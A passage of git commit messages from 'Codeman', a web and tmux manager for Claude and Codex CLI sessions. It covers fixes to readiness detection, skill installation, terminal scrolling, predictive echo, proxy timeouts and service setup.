trailing `\r`, so Enter was never sent and the prompt sat unsubmitted forever, and its
read step used `/output`, whose `textOutput` is always empty for interactive tmux-backed
sessions. A reader following the Chinese README walked into both of the silent failures
the English one warns about. Its agent/automation section is now brought in line with
README.md: the `\r` rule and every example that needs it, and the correct read path.
CLAUDE.md's "Single-line prompts only" gotcha described the newline restriction but
never mentioned that input must end with `\r` or Enter is never sent, which is the most
common silent failure when driving the API.
docs/agent-control-plan.md asserted as still-open several things that shipped in 1.14.1
and 1.14.2 (the wait endpoints, the packaged skill, the install CLI, agentSkillEnabled).
The status header and the stale bullets now match reality; the historical design content
is untouched, since the document is a record.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two ways the injection could go wrong quietly.
`installAgentSkillInto()` wrote each file with a bare `writeFile`, no lock and no
temp+rename, while every sibling mutator in hooks-config.ts goes through
`withSettingsLock`. Two Claude sessions created concurrently in one repo both wrote the
same ~16KB SKILL.md, and any reader loading it mid-write could observe a truncated
file. Writes now go through a temp+rename helper under the same lock the neighbours
use, so a reader sees either the old file or the new one.
Both server call sites discarded the outcome with `.catch(() => {})`, so the two
refusal results were invisible: `foreign` (a user-authored skills/codeman is present,
so we declined to touch it) and `symlink` (the skill dir or its parent is a symlink, so
we declined to write through it). Turning `agentSkillEnabled` on, seeing nothing appear
and having no way to find out why was the reportable-as-a-bug outcome. Refusals are now
logged with the path and what to do about it. The boring outcomes stay silent, since
they happen on every session create. Injection remains best-effort: a refusal or a
thrown error still cannot fail session creation.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The readiness gate matched `bypass`, which is the status bar of ONE permission mode.
`buildPermissionArgs()` also spawns `--permission-mode auto`, `--allowedTools` and
plain `normal`, and the mode is not exposed on `GET /api/v1/sessions/:id`, so an agent
cannot know which token to expect. A non-default worker was therefore reported broken
after burning the whole ladder.
Measured one pane per mode against claude-cli 2.1.226:
--dangerously-skip-permissions -> "bypass permissions on"
--permission-mode auto -> "auto mode on"
--allowedTools Read,Grep -> "don't ask on"
(none, normal) -> "don't ask on"
--permission-mode plan -> "plan mode on"
Every one ends `(shift+tab to cycle)`, so `shift+tab` is the single space-free token
that means "the composer is up" in every mode, and it is what the ladder matches now.
Verified live end to end on a virgin case: stage 1 misses while the trust dialog is up,
stage 2 accepts it, stage 3 matches in 623ms.
⚠️ `shift+tab` contains a `+`, so it only works through `--data-urlencode`. In a
hand-built query the `+` decodes to a space and the server searches for `shift tab`,
which never appears; the response echoes `match: "shift tab"`, which is how to spot it.
Measured both ways. The stage-4 fallback (make the worker echo a split token, proving
readiness by answering rather than by chrome) stays as the last resort, and is now also
verified live: it matched in 2.5s, with the token surviving the space-less TUI intact.
Also portable ANSI stripping: the read pipelines used `sed 's/\x1b...'`, and BSD sed
(the macOS default) has no `\xHH` escape, so on macOS the strip silently removed
nothing and handed the agent raw ANSI. They now build a real ESC with `printf`.
And endpoints.md gaps: the `FORBIDDEN` 403 row and which auth responses are plain text
rather than the JSON envelope, the input size cap, the undocumented `killMux` parameter
on DELETE, and the fact that zero/negative/non-integer timeouts are rejected with a 400
rather than clamped.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
With a real codex login now available, record the one shape the fake-key
lab could never produce: a genuine model reply streaming above the pinned
composer, pushing lines into history (baseY grows) while keystrokes land
mid-stream. The recorder gains an opt-in CODEX_RECORD_REAL=1 scenario
using the user's own ~/.codex (fixture secret-scanned for key/JWT
material before writing; scanned clean). The replay test pins: baseY > 0,
mid-stream predictions painted, exact convergence to the typed text.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The zerolag bundle exports only `XtermZerolagInput`, but app.js constructs
`new LocalEchoOverlay(terminal)` directly. scripts/build.mjs appends global
aliases after esbuild (build.mjs:53-66); the first version of this script
omitted that step.
Without them initTerminal() throws `LocalEchoOverlay is not defined` at the
line that builds the overlay — and because that is midway through the function,
EVERY later step silently never runs, including the mobile touch handlers on
#terminalContainer. The page still had a terminal, so the failure looked like a
tap-routing bug rather than a boot error.
Verified: boot errors none, and all four terminalContainer touch listeners
(touchstart/touchmove/touchend/touchcancel) now register.
The mobile suite drives a real browser against a WebServer started from
TypeScript source, so fastify-static serves join(__dirname, 'public') =
src/web/public — not dist/web/public, where `npm run build` puts the vendor
bundles. Every /vendor/xterm* request 404s, so `Terminal` is never defined,
initTerminal() never runs, and any test touching app.terminal dies with
"Cannot read properties of null".
Measured in one worktree, toggling only the vendor files:
before: 404s=5 Terminal=undefined app.terminal=null 8 failed | 26 passed
after: 404s=0 Terminal=function app.terminal=live 6 failed | 28 passed
The 6 remaining failures are genuine pre-existing bugs (stale layout and
accessory-bar expectations, a CJK timeout) and are left alone here.
This went unnoticed because config/vitest.ci.config.ts excludes test/mobile/**,
so CI never ran the suite. `npm run test:mobile` now runs it, with a pretest
hook that builds the bundles.
The asset list was derived from the actual 404s rather than from build.mjs —
which is how xterm-addon-unicode11 and xterm-zerolag-input got included; reading
the build file alone would have missed both. Outputs go to the gitignored
src/web/public/vendor/, so they stay build artifacts. The script is idempotent
(skips outputs newer than their source) and does not touch the normal build.
Full CI suite unchanged: 4368 passed.
Independent post-build review found three gaps, all one family: input that
changes the composer without a prediction leaves the DISPLAYED cursor stale
for one RTT, and anchoring a new run on it painted ghosts one cell off
(blank-neutral, so they lived out the full TTL: "tehh" on
backspace-then-retype, exactly on the links the feature targets).
Fix: the addon now HOLDS new predictions after any such edit (backspace with
nothing outstanding = deleting echoed text, clearPredictions, and now also
IME/plain-paste 'text' commits, which the hook clears like 'clear') until
the next PARSED write releases the hold. The inline predictChar reconcile
deliberately does not count: only the emitter pass or the public
reconcile() is the display-caught-up contract. Worst case is exactly one
unpredicted keystroke, whose own echo releases the hold. Also patched the
one bypass path the PR had missed: _handleCjkInput now clears predictions
like insertTerminalText and the other bypass sends.
Package suite 230, vm gating 85, E2E 10/10 all green after the change.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
ci.yml runs the xterm-zerolag-input suite (Layers 1-3) after the root
npm ci (workspaces hoisting; no separate install). CLAUDE.md and
architecture-invariants.md rewrite the codex echo story: predictive
write-through with the wire-neutrality, separate-bundle, composer-gate,
baseY and blank-neutral invariants spelled out; the single-source section
now covers both vendor bundles and why their entry points differ.
Changeset: minor for aicodeman + xterm-zerolag-input.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Out-of-process lab server (VITEST markers stripped so tmux/codex are real),
CODEMAN_INSTANCE=codexlab on port 3222, throwaway CODEX_HOME with a fake
key. Ten scenarios: bundle smoke, predict+converge typing, the #218 arrow
retest (submitted text exact), the #222 live picker, the #219 paste order,
the #220 wrap, the trust-modal ghost eliminator, the localEchoEnabled kill
switch, the end-to-end byte-identity trace (predictor active vs null), and
a display-delayed 300ms-RTT run pinning instant spans with exact pixel
geometry plus arrow-edit correctness under lag.
Live-TUI hardening learned the hard way: codex Ctrl+U kills only to line
start (End first), a fake-key submit leaves a Reconnecting loop that can
kill codex seconds later (retry-cancel + composer stability probe; the
submitting scenario runs after all composer-state ones), and typing must
wait for the predictWhen gate itself, not merely a rendered composer.
CI-excluded like the other Playwright suites; skips cleanly when codex is
not installed.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
terminal-ui.js: _localEchoPolicy ('buffer'|'predict'|'off') computed at the
end of _updateLocalEchoState with _localEchoEnabled keeping its exact 1.12.2
values; _predictHookOnData called as a plain statement between the buffer
block and Normal Mode (visual-only, try/catch, never returns, never touches
_pendingInput); classifyPredictInput + isCodexComposerRow (baseY-based,
measured /^> /-signature gate) on CodemanTerminalInput; construction beside
the LocalEchoOverlay from the separate bundle with graceful absence;
insertTerminalText/clearTerminalInput/setFontSize/applyTerminalSkin clear or
refresh predictions. app.js: fields + tab-switch and SSE-reconnect clears.
voice-input '\r' branch and keyboard-accessory sendKey clear predictions
(both bypass onData). sendEnterKey needs no change: codex falls through to
the immediate-flush branch.
Layer 4 vm tests: classify truth table (20 cases), composer-row gate incl.
the baseY pin, policy matrix with the 1.12.2 invariants untouched, wire
neutrality + throwing-predictor pins. Stale mobile keyboard codex-buffering
tests repointed at claude; new codex twin asserts write-through streaming,
prediction spans and TTL self-heal.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
postinstall + build.mjs build vendor/xterm-predictive-echo.js as a SEPARATE
IIFE (window.PredictiveEchoAddon + self-activating PredictiveEchoOverlay);
the zerolag bundle command is untouched and its output verified
sha256-identical. index.html loads it after the zerolag tag (cacheBustAssets
covers it), sw.js precaches it, build.mjs HASHABLE content-hashes it.
A missing or broken bundle degrades codex to plain PTY echo.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Mosh-style write-through prediction: the consumer sends every keystroke
unchanged; the addon paints predicted glyphs and reconciles against the
parsed buffer. Confirm = cell match + cursor advance (placeholder-safe,
repaint-safe); two-pass mismatch cascade with neutral blanks (measured:
codex clears its placeholder on first echo); TTL bound; baseY-based line
reads; scroll/resize/off-row clears. Zero edits to zerolag-input-addon.ts.
Tests: 30 addon-law specs + renderer geometry (fake performance clock for
TTL/grace), 6 replay suites running the real algorithm through a real
@xterm/headless parser fed by the recorded codex fixtures, and a
500-iteration seeded fuzz with per-op span/record + grid invariants.
227 total, the pre-existing 175 untouched.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Recorder (scripts/dev/record-codex-frames.mjs) captures real codex 0.147
TUI output through the production pipeline (tmux status-off + the codex-mode
full strip from session.ts) into JSONL fixtures with keystroke injection
points; analyzer replays them through @xterm/headless for the measurements
in docs/predictive-echo-plan.md. Composer signature /^> /-style (U+203A),
modal and wrapped rows correctly rejected, echo is unstyled default-fg,
tmux delivers echo as minimal in-place deltas.
Package: types.ts gains optional cursorX/cursorY, getCell, onWriteParsed,
onResize (all additive); prediction-renderer.ts renders per-glyph spans
keyed by prediction seq; @xterm/headless@^6.0.0 devDep for replay tests.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Reported by @mtiller.
`codeman status` runs in its own fresh process, and reported THAT process's
always-stopped Ralph loop under a bare "Status:", which reads as "the web server
is down" while the service is running fine and agents are reachable. It now probes
the real server first (`CODEMAN_API_URL`, else https then http on the local port,
overridable with `--url`) and reports reachability, version and live session
state. Any HTTP answer proves the server is up, including a 401 from a
password-protected install. The Ralph loop keeps its own `codeman ralph status`.
This complements `codeman web --status` from the daemon work: that answers "did I
start a daemon", this answers "is a server running at all", which is what the bare
command was already being used for.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Reported by @mtiller.
A session named `w2-foo-bar: some description` rendered both halves on the tab, so
the generated id ate the width that the part the user actually chose needed. The
tab now shows the description alone and the `w<n>-<case>` id moves to the tooltip,
where it stays available without being read every time. It is still shown in the
session settings modal. Undescribed tabs are unchanged.
`aria-label` deliberately keeps the FULL name, so screen readers still get the id.
Also fixes a re-render loop this exposed: the incremental update compared
`nameEl.textContent` against the full name, which for a described tab never
matched, so those tabs re-rendered on every pass. The compare now targets the
display label.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Reported by @DodgyBadger.
#237: the proxy wrapped each upstream fetch in a 30s `AbortSignal.timeout`, which
bounded the ENTIRE exchange rather than the wait for response headers. A dashboard
endpoint doing model inference, and any actively streaming response, both died at
30s as a generic 502 that Codeman never logged, so it read as an intermittent
network error. The timeout now bounds time-to-headers only and is cleared the
moment headers arrive, so a slow endpoint and a long stream both survive. The
default moves to 300s because "the app is thinking" is normal for the dashboards
people proxy; abandoned upstreams are reclaimed by the client-hangup abort rather
than by this value.
A browser that navigates away mid-request now aborts the upstream fetch, guarded
by `writableFinished` for the same reason as `abortOnClientHangUp` in
session-routes: `close` also fires after a completed response and must not abort
anything. Header timeouts are logged as a warning with a sanitized identity
(method plus origin plus path, never the query string, which can carry the
dashboard's tokens), and a client hangup is deliberately not warned since nobody
is listening and it would read as the dashboard being broken.
The WebSocket handshake keeps its own 30s budget
(`CODEMAN_WEBVIEW_WS_HANDSHAKE_TIMEOUT_MS`), decoupled from the request timeout:
a handshake is connection establishment, and waiting minutes on one only delays
the browser's reconnect logic.
#238: the web-tab guide covered sandboxed dashboards having no cookies, but not
cookie authentication in front of Codeman itself (Cloudflare Access and similar),
where a sandboxed frame's asset and API requests carry no auth cookie, bounce to
the login provider, and leave the embedded app looking unstyled or broken while
trusted mode works. Documented, and the Test button's result now says it probes
server-to-upstream reachability only, not how the page behaves in a sandboxed
frame.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Ship `skills/codeman` as an installable Claude Code skill rather than a
repo-only reference, and fix six defects found while verifying it live.
Install layer:
- `codeman skill install [--case <name>]` / `codeman skill uninstall`.
Case names resolve through linked-cases.json first, mirroring the
server's resolveCasePath(), so a case linked in from outside
~/codeman-cases no longer fails with "Case not found".
- applyAgentSkill() / installAgentSkillInto() / removeAgentSkillFrom() in
hooks-config.ts. Copies are marker-owned, so an unmarked user-authored
skill is never touched, and a symlinked skill dir is refused (this
repo's own .claude/skills/codeman is a symlink to the source).
- Synced `agentSkillEnabled` setting, default OFF: schemas.ts,
ports/config-port.ts, server.ts, session-routes.ts (add-only injection
on Claude session create and quick-start), plus the App Settings toggle.
Skill content fixes, each reproduced before and after:
- Fail-closed `delete_session` replaces `is_self ... || curl -X DELETE`.
Shell state does not survive between agent tool calls, and an undefined
is_self exited 127, firing the `||` branch and deleting the caller's own
session with the one guard bypassed. The request now lives inside the
guard, so a lost preamble deletes nothing.
- clientId is a fixed literal instead of `agent-$$`. The pid changes per
tool call, so the documented resend-identical-request loop stopped being
a duplicate and retyped the prompt, submitting the turn twice.
- `last-response` is now the documented read path for claude and codex
workers. It returns clean transcript text; the terminal scrape it
replaces returns a wall of TUI repaint noise. Its transcript flush lags
the stop signal, so the recipes poll it rather than reading once.
- quick-start examples branch on `.success`. Previously a failed spawn
yielded the literal session id "null" and burned the whole readiness
budget before reporting jq noise instead of the cause.
- Documented that turning `agentSkillEnabled` off sweeps nothing, and
corrected the hooks-config comment that claimed a toggle-off sweep
exists. Per-case cleanup is `codeman skill uninstall --case <name>`.
- Documented that SESSION_BUSY means the 50-session cap on quick-start,
and that caseName resolves linked cases, so a generic name can land a
worker in a real repo.
Tests: test/agent-skill.test.ts covers install, refresh, idempotence,
marker ownership and symlink refusal against the real packaged source;
test/quick-start.test.ts covers injection behind the setting.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
DodgyBadger reported a completely dead wheel in codex tabs (#227 comment)
while the scrollbar drag worked, and the [scroll] line confirmed the
branch: forward-sgr with 967 rows of healthy local scrollback unused.
Measured against codex-cli 0.147.0 in a bare tmux: codex never enables
mouse tracking (mouse_any_flag=0), runs an inline viewport
(alternate_on=0) and pushes its transcript into the terminal's own
scrollback (history_size grows), and SGR wheel reports written to its
pane change nothing at all. Hand-encoded SGR taps are no-ops too, so
they stay (harmless), which means click-to-position is merely
unavailable there rather than damaging.
_shouldForwardWheelToApp now returns true for claude >= 2.1.187 and
nothing else; codex falls to the local-scrollback path like
shell/gemini/opencode, which is the same history the scrollbar drag was
already reaching. The claude-only PageUp fallback is untouched.
Verified in Chromium against a live codex session on an isolated
instance: routing logs local-scrollback, the viewport moves 39 -> 4 and
zero bytes go to the PTY.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
test/sse-subscription-filter.test.ts already binds 3212; sequential test
execution hid the clash. Moves the probeServer fixture to 3216 (3217 for
the nothing-listening case) per the unique-port convention.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Conflict in refreshStaleCodemanHooks resolved by keeping every staleness
trigger: the master-side TLS-flagless curl check (hooks without -k) AND the
PR-side current-wake-marker (V3) + SubagentStop guard marker checks.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Two ways to keep the server running, split by how long it should last.
`codeman web -d` relaunches the same entry script detached (setsid), with
`--stop` and `--status` alongside it. A pidfile and log live in the data
dir. `nohup` is not what makes this work: Node re-arms SIGHUP to its
default disposition even when it inherits "ignore", and cli.ts handles
SIGHUP with a graceful shutdown, so a delivered HUP still stops the
server. Removing the shell's ability to send one is the fix.
`codeman service install|uninstall|status` writes and loads the systemd
user unit or the LaunchAgent, with the installing shell's PATH baked in
(launchd hands a job /usr/bin:/bin:/usr/sbin:/sbin, which finds neither a
Homebrew/nvm node nor tmux/claude). install.sh already covers one-liner
installs; this is for npm globals.
Both refuse to start when a server is already up on the data dir, since a
second instance on the shared tmux socket attaches PTYs to the first
one's live sessions. Both poll /api/status until the child answers or
dies rather than reporting a success they have not seen. `--stop` checks
the pid still looks like a Codeman server before signalling it.
The systemd unit name and launchd label move to config/service-names.ts
so install.sh, detectSupervisor() and service install cannot drift into
supervising two copies. Instance-scoped, unchanged for the default
instance.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two defects in the background-task hook scripts.
SubagentStop had no handler at all. When a subagent launched background work and
one watcher ended while others were still running, Claude could publish the
worker's last progress sentence as its final result, abandoning the live tasks.
A new guard pairs launched task IDs against completed ones and confirms liveness
by scanning /proc/<pid>/fd for an open tasks/<id>.output handle, blocking the
stop only while genuinely-live work remains. It fails open — allowing the stop —
when /proc is unavailable, nothing was launched, or everything finished.
The rewake helper watched only input.transcript_path. A subagent has its own
transcript, but Claude writes the completion queue-operation to the PARENT
transcript, so the record it waited for never appeared and the wake never fired.
It now watches both paths, but only when the relationship is provable: the
transcript's parent directory is subagents/ and its grandparent basename equals
input.session_id. It also now requires operation === 'enqueue'.
The rewake marker moves V2 -> V3; refreshStaleCodemanHooks treats absence of the
current marker as stale, so existing cases self-heal on next launch (the same
mechanism as the V1 -> V2 bump). Ownership matches on marker PREFIXES, so a
future bump still recognises older Codeman handlers and never adopts a user's.
12 tests fail on unmodified master, e.g.
expected '[{"matcher":"Bash",…' to contain 'CODEMAN_BACKGROUND_REWAKE_V3'
expected 'Background command bg-report-1 comple…' to contain '<codeman-background-result>'
AiCheckerBase spawned the check with `> out 2>&1`, so anything the Claude CLI
wrote to stderr landed inside the same file the verdict parser reads. A CLI that
failed to start (corrupt settings, missing auth) produced either an empty verdict
or an unparseable one, and the actual cause was destroyed on the way through —
the user saw only "Empty output from AI idle check".
stderr now goes to its own temp file. When output is empty or the verdict cannot
be parsed, the first 200 characters of stderr are appended to the error message.
The file is cleaned up alongside the existing temp files, including on the error
paths.
Two tests, both failing on master:
expected 'export PATH="…' to contain ' 2> "'
expected 'Empty output from AI idle check' to contain 'Claude CLI failed to load settings'
Rework of the previous hover-overlay approach after feedback: sliding the
title under incoming icons made names hard to read, and icons appearing
under the cursor caused accidental gear/close clicks while switching tabs.
Now the gear/pop-out/close icons expand in flow on the ACTIVE tab only.
Selection is a deliberate click, so the strip's geometry never changes
while the pointer is aiming at a tab; hovering a background tab changes
nothing (the full title stays readable) and a stray click can only switch
sessions. Middle-click closes any tab (session tabs via the existing
close-confirm modal, web tabs via closeWebviewTab), matching browser
muscle memory so background tabs still close in one action.
The pop-out button stays opt-in via App Settings -> Tab Bar (per-device
showTabDetachButton, default off), and a detached tab keeps its icon as
the re-focus affordance. Phone layouts already used the active-only
pattern; tablets keep their always-visible touch fallback.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Hovering a session tab no longer grows it. The three per-tab icons now
live in a .tab-actions wrapper that overlays the tab's right edge on
hover-capable devices: the icons slide in while the title (and any
badges) slide left by a per-tab --tab-slide distance computed in
_applyTabHoverSlide(), clipped at the left edge of .tab-info so the
readable tail (the :comment suffix) stays visible. Keyboard focus
reveals the overlay via :has(:focus-visible), so a mouse click on the
gear does not pin it open. Touch devices keep the previous in-flow
behavior (the wrapper adds no width in flow, and the legacy tap-reveal
rules are preserved under @media (hover: none)).
The open-in-a-new-window (pop-out) button is now hidden by default and
opt-in via App Settings -> Tab Bar -> "Pop-out Button on Tabs"
(showTabDetachButton, per-device, absent from SettingsUpdateSchema like
the other display keys). A tab whose session is already detached keeps
its icon as the re-focus affordance regardless of the setting.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
A visualViewport resize event without a pending show/hide transition now
only pushes a pending settle back (_deferViewportSettle) instead of arming
fit + PTY-resize work of its own. Keyboard detection can miss a
fine-grained OS animation entirely (each step under 150px, with the
baseline chasing the animation down), while MobileDetection's own listener
still shrinks --app-height, so the per-event settle fitted xterm against a
mid-animation container with no keyboard CSS compensation and resized the
PTY to transient dims. The resulting SIGWINCH thrash (58 -> 10 -> 50 rows)
duplicated prompts and left tmux dot filler in the transcript on keyboard
close. Reproduced with a faked visualViewport driving the real handler;
master is unaffected because it never resized the PTY from this path.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The suite never selects a session, so initTerminal() does not run and both
`app.terminal` and `app.fitAddon` are null at rest. `_scheduleViewportSettle`
returns early on a falsy terminal, so the coalescing assertions could not
reach the behavior they claimed to cover -- the test errored on
`Cannot read properties of null` rather than measuring anything.
Installs the minimum surface the settle callback touches and restores it
afterwards, so the coalescing path executes for real.
Adds a behavioral counterpart driven through the PUBLIC entry point
(`onKeyboardShow`) instead of the internal scheduler: three viewport steps
in quick succession must produce exactly ONE refit. On master that returns
3 (each show arms its own uncoalesced 150ms timeout), so this fails by
COUNT rather than by a missing method -- which is the failure mode that
actually demonstrates the bug.
Verified: `expected 3 to be 1` on unmodified master; passes here. The
remaining 8 failures in this file are pre-existing on master and unrelated
(same null-initialization limitation of the headless harness).
The reworded tooltip promised the PageUp/PageDown fallback for Claude and
Codex alike, but _localScrollbackIsHollow() gates it to claude mode only
(codex page-key handling is unverified, as the routing tests note). A codex
user reading the old text would flip the setting expecting a rescue and get
a dead wheel instead. Say plainly that Codex has no fallback.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The synthetic session names end up in the harness screenshots, so shipping one
contributor's project list into everyone else's review reads oddly. The mix of
CLI modes is what the fixture actually needs — each renders a different badge —
and that is unchanged.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The script carried two absolute paths from the machine it was written on: a full
scratchpad path including a session UUID, and /home/chaberl/projects as the
synthetic sessions' working directory. This branch is pushed to a public fork, so
they were visible to anyone.
Screenshot output now defaults to tmpdir() and is overridable via
SIDEBAR_SHOTS_DIR; the synthetic working directories are tmpdir()-based too, which
also makes the harness run for anyone who checks the branch out.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The header tab strip stops working past roughly a dozen sessions: it wraps
into two or three rows, eats vertical space and still cannot be scanned.
This adds a vertical session list in a left <aside> as an ALTERNATIVE
layout — a filter box, a live count, and a 44px collapsed rail that keeps
the ambient signal (status dot, task badge) visible.
The strip is not removed. Settings -> Display -> Tab Bar -> Session List
Layout switches between them and the default stays 'header', so existing
users see no change until they opt in.
Structure: one #sessionTabs element, two mount points. applySessionListLayout()
re-parents the SAME node between #sessionTabsHost and #sessionSidebarList,
which is why there is no second renderer and no duplicated wiring — app.$()
caches getElementById results and never invalidates them, so a moved node
keeps every existing consumer (settings-ui, webview-tabs, the generated
gesture bundle, the mobile tests) working untouched.
Notable integration points:
- Below 1024px the sidebar is an off-canvas drawer overlaying the terminal;
closed it gets inert + aria-hidden so it cannot be tabbed into, and touch
swipes over it no longer switch sessions.
- Subagent and ultracode windows anchor to the right edge of a sidebar row
instead of its bottom, connector curves follow.
- Alt+B toggles; the chord is gated out of the PTY so xterm cannot also
write ESC b into a live session.
- Collapse state lives in its own localStorage key (the settings blob is
rebuilt from DOM controls on every save) and falls back to in-memory
intent where storage throws.
Verified: frontend syntax + public asset checks, tsc, eslint, 26 new jsdom
tests, and a headless-Chromium harness (scripts/verify-session-sidebar.mts)
that renders a synthetic 25-session fleet in both layouts at 1600/1000/393px
and asserts mount point, widths, inert/aria state and row count.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The 1.12.0 retest on #205 reported it still broken in two shapes: a wheel that
did nothing at all on Firefox/macOS (while Fn+Up paged back through intact
text), and iPhone history that went back a little, repeated blocks and got
worse the further up it went. Both come from a Claude pane's LOCAL buffer being
hollow: tmux keeps no history for a repaint-mode pane (history_size 0), so
xterm holds only replayed repaint frames.
1. The scroll-to-top full=1 re-pull now refuses a DOWNGRADE. It resets the
terminal and rewrites it from the capture, which is a win when tmux holds
more than the browser, but for a repaint-mode pane that capture is roughly
ONE frame and the rewrite deleted history mid-scroll. Measured A/B on a live
pane, same gesture: guard off collapses 341 rows to 42, guard on preserves
all 341. _replayWouldShrinkBuffer() estimates the capture's rendered rows
(escapes stripped, capture-pane -J re-wrapping accounted for) and skips the
rewrite when it is more than one screen short; a refused session's cooldown
goes from 4s to 60s so a hollow pane stops re-fetching megabytes.
2. A false forwarding gate on a Claude session no longer means a dead gesture.
Under a triple guard (claude mode, gate false, baseY 0), wheel and touch
travel becomes coalesced PageUp/PageDown through the same 40ms queue as the
SGR reports, at half a screen of travel per page key. Shift is excluded: it
keeps meaning "local scrollback".
3. getClaudeCliVersion() no longer caches FAILURE. It stored null on any
exception and guarded on !== undefined, so one timed-out or PATH-starved
probe at the first Claude session start disabled wheel-forwarding for every
Claude session until the server restarted, which fits a report of breakage on
phone, tablet and laptop at once. Success is still cached for the process
lifetime; failures retry with a 1/2/4 up to 15min backoff, and the policy is
a pure function so the semantics are testable without spawning claude.
4. The terminalWheelLocalScrollback footgun is handled by pairing rather than
scoping: the setting keeps meaning exactly what it says, and fix 2 catches
the case where "local" is empty. The App Settings tooltip now says to leave
it off for Claude/Codex sessions.
5. _logScrollRouting() prints one line per session per distinct decision:
forward-sgr / page-keys / local-scrollback / repull-refused-downgrade, with
mode, cliVersion, the opt-out state, mouse tracking and local scrollback
depth. #205 ran two rounds of remote guesswork over questions that line
answers directly.
Verified end to end against a real isolated instance (own data dir and tmux
socket) with real wheel events: forwarding still sends SGR reports, the opt-out
now sends real PageUp/PageDown where the wheel was dead, a tab-switch collapse
(401 rows to 44) is still fully recovered by the re-pull (back to 401), and a
seeded 341-row Claude buffer survives the same gesture that destroys it with the
guard disabled.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Cosmetic, but the kind that quietly costs: JSDoc tooling attaches only the
nearest block, so a stacked second block silently hides the first.
- write() had two: the original description with @param and @example, then a
@returns-only block added on top, which dropped the params and examples from
hover. Merged into one. The @returns wording is also honest now — write() still
discards the data without a PTY; what changed is that it says so.
- forgetInputSeq had been inserted BETWEEN shouldApplyInput's detailed doc comment
and its declaration, leaving that function undocumented on hover and the doc
attached to the wrong thing. Moved below.
- The mock kept an orphaned one-line comment above failWrites' own block.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two blockers from the pre-submission gate, both reproduced before fixing.
1. The changeset claimed the non-mux POST branch answers OPERATION_FAILED. The
code says the opposite in as many words ("NOT an error response,
deliberately"), the commit message says response codes are unchanged, and the
test asserts the 200. It was a leftover sentence from an earlier iteration that
would have shipped into the CHANGELOG announcing an API contract change that
does not exist — and errorCode values are SemVer-relevant per
docs/versioning-policy.md.
2. The WebSocket half of the fix had no test protection: reverting ws-routes.ts to
master left all 9 tests green, while the commit message sells "plus the whole
WebSocket path" as part of the fix. Three tests added against the real WS
route — ACK on delivery, ACK withheld and seq re-opened when the write did not
land, and a deduplicated frame still ACKed so the client can drop it. Verified
the other way round: with ws-routes.ts reverted, the middle one fails.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two smoothness refinements on the local wheel path: the drain factor
drops from 35% to 22% per frame, so the first frame of a notch takes a
smaller step and the glide lasts longer; and local scrolling accumulates
FRACTIONAL lines (_wheelScrollLinesFloat) instead of rounding every
event, so a slow macOS trackpad drag no longer snaps a whole line per
tiny delta (the old ±1 fallback made slow drags scroll faster than the
finger). Sub-line residuals stay pending until further input crosses a
whole line. Forwarded SGR ticks keep the rounded integer path. Probe:
a 20-line notch now glides through 14 positions to an exact landing;
the 9-check scroll matrix still passes.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The capture-phase handler owns local scrolling (xterm's smooth scroller
is bypassed for the stale-dimensions reasons documented there), which
made every notch an instant multi-line jump. Wheel deltas now accumulate
into a pending line count drained ~35% per animation frame with a
one-line floor, so scrolling glides and extra notches mid-glide read as
acceleration. Pending momentum is dropped on session switch so it never
scrolls the tab the user just switched to. Verified on the beta: a
20-line notch eases over 9 frames to an exact landing, and the 9-check
scroll matrix still passes.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Measured on the live instance: xterm's vscode-style viewport scroller
consumes wheel events itself whenever it believes a scrollbar exists
(preventDefault + stopPropagation, attachCustomWheelEventHandler is not
consulted), so Codeman's bubble-phase handler never fired once local
scrollback existed. Forwarding, the deltaMode conversion and the
top-of-buffer history re-pull were all silently dead exactly on the
sessions that had history, which is the 'input box scrolls up then it
fights and hangs' report. Worse, that scroller's dimensions go stale
after terminal.reset(): following a tab switch or full-history replay it
neither scrolls nor propagates, which is the 'works at first, breaks
after reload and tab switch' report.
The container wheel listener now runs in capture phase, stops
propagation, and scrolls locally through buffer-level scrollLines(),
which keeps working after resets. Mouse-tracking sessions and the
alternate buffer (direct-PTY vim/less) are passed through untouched so
xterm's encoder and alt-scroll arrow conversion keep owning those.
Verified end to end against the beta: 9/9 matrix checks including the
exact reported flows (claude wheel with scrollback present stays pinned
and forwards, shell reaches full history by wheel alone, reload then tab
switch then back still works, SSE reconnect survives, Shift+wheel stays
local), plus the two prior E2E suites re-passing 10/10 and 6/6.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Update the full-scrollback replay invariant (per-session full=1 Set plus
the scroll-to-top re-pull), add a new invariants section covering the two
strip flavors and the wheel/touch forwarding rules, sync the CLAUDE.md
